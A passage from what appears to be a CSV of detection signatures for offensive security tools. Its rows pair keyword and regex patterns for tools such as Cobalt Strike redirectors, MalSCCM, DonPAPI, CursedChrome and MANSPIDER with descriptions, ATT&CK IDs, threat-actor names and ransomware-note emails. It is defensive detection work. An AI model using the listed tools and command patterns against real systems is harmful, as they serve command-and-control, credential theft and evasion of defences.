- Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","51607" "*malleable_redirector.py*",".{0,1000}malleable_redirector\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","51608" 
"*malleable_redirector_hidden_api_endpoint*",".{0,1000}malleable_redirector_hidden_api_endpoint.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","51609" "*Malleable-C2-Profiles*",".{0,1000}Malleable\-C2\-Profiles.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security 
assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51610" "*Malleable-C2-Randomizer*",".{0,1000}Malleable\-C2\-Randomizer.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","51611" "*Malleable-C2-Randomizer*",".{0,1000}Malleable\-C2\-Randomizer.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51612" "*malleable-c2-randomizer.py*",".{0,1000}malleable\-c2\-randomizer\.py.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","1","N/A","N/A","10","10","1053","172","2024-06-25T11:10:54Z","2020-03-23T14:13:16Z","51613" "*MalleableProfileB64*",".{0,1000}MalleableProfileB64.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - 
TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","N/A","10","10","220","49","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z","51614" "*MalleableProfiles.vue*",".{0,1000}MalleableProfiles\.vue.{0,1000}","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","10","1461","206","2025-03-25T03:30:16Z","2020-03-09T05:48:58Z","51615" "*malleable-redirector-config*",".{0,1000}malleable\-redirector\-config.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","51616" "*mallox.resurrection@onionmail.org*",".{0,1000}mallox\.resurrection\@onionmail\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51617" 
"*MalSCCM.exe*",".{0,1000}MalSCCM\.exe.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tool","https://github.com/nettitude/MalSCCM","1","1","N/A","N/A","10","3","246","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z","51618" "*MalSCCM-main*",".{0,1000}MalSCCM\-main.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tool","https://github.com/nettitude/MalSCCM","1","1","N/A","N/A","10","3","246","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z","51619" "*malware.NewConfig*",".{0,1000}malware\.NewConfig.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","51621" "*malwaredllc*",".{0,1000}malwaredllc.{0,1000}","offensive_tool_keyword","byob","BYOB is an open-source post-exploitation framework for students. 
Pre-built C2 server Custom payload generator 12 post-exploitation modules It is designed to allow students and developers to easily implement their own code and add cool new features without having to write a C2 server or Remote Administration Tool from scratch","T1024 - T1059 - T1064 - T1002 - T1071","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/malwaredllc/byob","1","0","N/A","N/A","N/A","10","9150","2142","2025-03-10T23:35:13Z","2017-12-18T09:10:12Z","51622" "*malwareurl = ""https:*",".{0,1000}malwareurl\s\=\s\""https\:.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","51623" "*man_in_the_browser.json*",".{0,1000}man_in_the_browser\.json.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","51624" "*man_spider.manspider:main*",".{0,1000}man_spider\.manspider\:main.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","51625" "*manage/reflective_dll_inject*",".{0,1000}manage\/reflective_dll_inject.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","51627" "*ManagedEasyHook.dll*",".{0,1000}ManagedEasyHook\.dll.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","51628" "*manageengine_adselfservice_plus_cve_2022_28810.*",".{0,1000}manageengine_adselfservice_plus_cve_2022_28810\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51630" "*manageengine_xnode/CVE*",".{0,1000}manageengine_xnode\/CVE.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51631" "*manager/keepass.py*",".{0,1000}manager\/keepass\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","51632" "*manager/mRemoteNG.py*",".{0,1000}manager\/mRemoteNG\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","51633" "*managersmaers@tutanota.com*",".{0,1000}managersmaers\@tutanota\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51634" "*manasmbellani/brc-1.2.2*",".{0,1000}manasmbellani\/brc\-1\.2\.2.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - 
T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51635" "*mandatoryprogrammer/CursedChrome*",".{0,1000}mandatoryprogrammer\/CursedChrome.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","1","N/A","N/A","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","51636" "*mandiant/ADFSDump*",".{0,1000}mandiant\/ADFSDump.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","1","N/A","N/A","10","4","349","67","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z","51637" "*mandiant/ccmpwn*",".{0,1000}mandiant\/ccmpwn.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","1","N/A","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","51638" "*mandiant/DueDLLigence*",".{0,1000}mandiant\/DueDLLigence.{0,1000}","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","N/A","10","5","469","89","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z","51639" "*mandiant/gocrack*",".{0,1000}mandiant\/gocrack.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","51640" "*mandiant/msi-search*",".{0,1000}mandiant\/msi\-search.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","N/A","10","3","276","31","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z","51641" "*mandiant/SharPersist*",".{0,1000}mandiant\/SharPersist.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","1","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","51642" "*mandllinject *",".{0,1000}mandllinject\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 
- T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","0","N/A","N/A","10","10","151","23","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z","51643" "*manspider * -d * -u * -p *",".{0,1000}manspider\s.{0,1000}\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","51644" "*manspider */24 -f *",".{0,1000}manspider\s.{0,1000}\/24\s\-f\s.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
